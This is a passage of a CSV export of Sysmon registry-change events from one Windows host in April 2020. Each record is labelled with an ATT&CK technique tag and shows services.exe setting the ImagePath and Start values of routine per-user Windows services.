C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.383",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.009467900Z"",""eventRecordID"":""529"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.343",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.008533700Z"",""eventRecordID"":""528"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3ea3f\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 10:25:40.329",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.005449600Z"",""eventRecordID"":""527"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.316",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.005239800Z"",""eventRecordID"":""526"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\MessagingService_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\MessagingService_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\MessagingService_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.298",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.004210500Z"",""eventRecordID"":""525"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 10:25:40.287",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.003632200Z"",""eventRecordID"":""524"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.962\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicesFlowUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.962"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicesFlowUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.962 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.255",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.001338600Z"",""eventRecordID"":""523"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 10:25:40.244",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:35.000982500Z"",""eventRecordID"":""522"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DevicePickerUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DevicePickerUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DevicePickerUserSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.218",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.999775800Z"",""eventRecordID"":""521"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow -p""" +"Apr 24, 2020 @ 10:25:40.202",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.999409800Z"",""eventRecordID"":""520"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\DeviceAssociationBrokerSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\DeviceAssociationBrokerSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.199",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.997619500Z"",""eventRecordID"":""519"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\CredentialEnrollmentManager.exe\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\CredentialEnrollmentManager.exe""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\CredentialEnrollmentManager.exe""" +"Apr 24, 2020 @ 10:25:40.140",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.997386000Z"",""eventRecordID"":""518"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CredentialEnrollmentManagerUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CredentialEnrollmentManagerUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.124",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.996413100Z"",""eventRecordID"":""517"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k DevicesFlow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k DevicesFlow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k DevicesFlow""" +"Apr 24, 2020 @ 10:25:40.111",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.996198400Z"",""eventRecordID"":""516"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\ConsentUxUserSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\ConsentUxUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\ConsentUxUserSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:40.096",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.995363200Z"",""eventRecordID"":""515"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 10:25:40.078",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.994898200Z"",""eventRecordID"":""514"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CDPUserSvc_3ea3f\\Start\r\nDetails: DWORD 